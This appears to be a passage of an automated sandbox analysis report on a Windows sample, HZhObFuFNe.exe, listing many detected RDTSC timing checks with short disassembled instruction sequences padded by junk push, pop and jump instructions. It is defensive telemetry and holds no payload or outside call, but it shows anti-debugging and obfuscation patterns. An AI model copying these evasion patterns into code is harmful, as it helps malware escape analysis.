Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545775 second address: 1545779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15458E4 second address: 15458EE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6FA4524816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1549CAD second address: 1549CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1549CFC second address: 1549D06 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA4524816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1549D06 second address: 1549D10 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6FA52293BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154FA2A second address: 154FA30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154FA30 second address: 154FA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BAh 0x00000009 popad 0x0000000a jmp 00007F6FA52293C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154FA55 second address: 154FA5A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154EE26 second address: 154EE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BBh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007F6FA52293B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154EE41 second address: 154EE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154EE47 second address: 154EE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154F13C second address: 154F144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154F3F6 second address: 154F409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F6FA52293BBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154F409 second address: 154F41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F6FA4524818h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154F576 second address: 154F57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E2F second address: 1554E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E33 second address: 1554E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E39 second address: 1554E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6FA4524829h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E5A second address: 1554E6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E6F second address: 1554E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E75 second address: 1554E89 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F6FA52293B6h 0x0000000e jns 00007F6FA52293B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E89 second address: 1554E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 155414F second address: 155415F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6FA52293B6h 0x00000008 jg 00007F6FA52293B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15542FA second address: 155430D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F6FA4524816h 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F6FA4524816h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554599 second address: 15545A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007F6FA52293B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554B1C second address: 1554B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554B26 second address: 1554B2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554B2C second address: 1554B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F6FA452481Eh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6FA452481Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554B51 second address: 1554B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293BBh 0x00000009 jmp 00007F6FA52293C5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1557F75 second address: 1557FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6FA4524829h 0x0000000c jmp 00007F6FA4524820h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1557FA5 second address: 1557FAB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1557FAB second address: 1557FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1557FB6 second address: 1557FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520948 second address: 152094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15209D7 second address: 15209DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520AC7 second address: 1520AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520AD7 second address: 1520AE8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520AE8 second address: 1520AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520AEC second address: 1520B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6FA52293C4h 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push edx 0x00000012 jng 00007F6FA52293B8h 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jns 00007F6FA52293BCh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520B3C second address: 1520B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521289 second address: 152128D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521588 second address: 152158E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152158E second address: 1521594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521594 second address: 1521598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1521598 second address: 1508323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F6FA52293C5h 0x00000010 xor edi, 1B503119h 0x00000016 pop edx 0x00000017 lea eax, dword ptr [ebp+12487EDDh] 0x0000001d sub dword ptr [ebp+122D1D2Ch], esi 0x00000023 mov edi, 3571D8E2h 0x00000028 push eax 0x00000029 push edi 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e pop edi 0x0000002f mov dword ptr [esp], eax 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F6FA52293B8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c js 00007F6FA52293BCh 0x00000052 mov dword ptr [ebp+122D3013h], ecx 0x00000058 call dword ptr [ebp+122D1DF2h] 0x0000005e jo 00007F6FA52293C4h 0x00000064 push eax 0x00000065 push edx 0x00000066 jnl 00007F6FA52293B6h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1558227 second address: 155822D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 155822D second address: 1558239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F6FA52293B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1558239 second address: 155823D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 155866F second address: 1558688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6FA52293B6h 0x0000000a jnl 00007F6FA52293B6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F6FA52293B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15588D5 second address: 15588E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15588E1 second address: 15588E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 155C867 second address: 155C86C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 155C86C second address: 155C877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 155C877 second address: 155C87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 14D4516 second address: 14D4520 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6FA52293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1560746 second address: 156074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 156074B second address: 1560751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1560751 second address: 156075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6FA4524816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1565D7B second address: 1565D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c je 00007F6FA52293B6h 0x00000012 jmp 00007F6FA52293BAh 0x00000017 popad 0x00000018 push edi 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1565D9C second address: 1565DB2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA452481Ch 0x00000008 je 00007F6FA452481Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 156513A second address: 1565164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F6FA52293BDh 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007F6FA52293BEh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1565164 second address: 1565181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Fh 0x00000007 jc 00007F6FA4524816h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 156544B second address: 1565455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6FA52293B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1565455 second address: 156545B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 156545B second address: 156547C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6FA52293C9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 156547C second address: 1565480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1565480 second address: 1565486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1564485 second address: 1564489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 156A111 second address: 156A122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 156C768 second address: 156C76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 156C76C second address: 156C77A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 156C324 second address: 156C34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6FA4524825h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F6FA4524816h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1571E02 second address: 1571E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1571E08 second address: 1571E23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Dh 0x00000007 js 00007F6FA4524816h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1571E23 second address: 1571E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1571E27 second address: 1571E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6FA4524816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007F6FA4524850h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 jl 00007F6FA4524816h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15711B1 second address: 15711E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F6FA52293B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007F6FA52293B6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F6FA52293C7h 0x0000001a jng 00007F6FA52293B6h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15711E4 second address: 15711EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 157185E second address: 1571862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1571862 second address: 1571868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1571868 second address: 157188F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6FA52293B8h 0x0000000c push esi 0x0000000d jmp 00007F6FA52293C2h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 157188F second address: 1571893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1575E3C second address: 1575E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1575E40 second address: 1575E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 157628E second address: 15762B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6FA52293C2h 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f jl 00007F6FA52293B6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1520F02 second address: 1520F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1520F06 second address: 1520F2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnp 00007F6FA52293B9h 0x00000010 add dh, FFFFFF99h 0x00000013 push 00000004h 0x00000015 pushad 0x00000016 sub si, 41B2h 0x0000001b cmc 0x0000001c popad 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007F6FA52293B8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1520F2E second address: 1520F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6FA4524816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 157FFF3 second address: 1580008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jl 00007F6FA52293B6h 0x0000000e pop ecx 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1580008 second address: 158000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 158000E second address: 1580024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6FA52293BDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 1580181 second address: 1580186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe RDTSC instruction interceptor: First address: 15802CD second address: 15802EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BFh 0x00000009 jbe 00007F6FA52293B6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
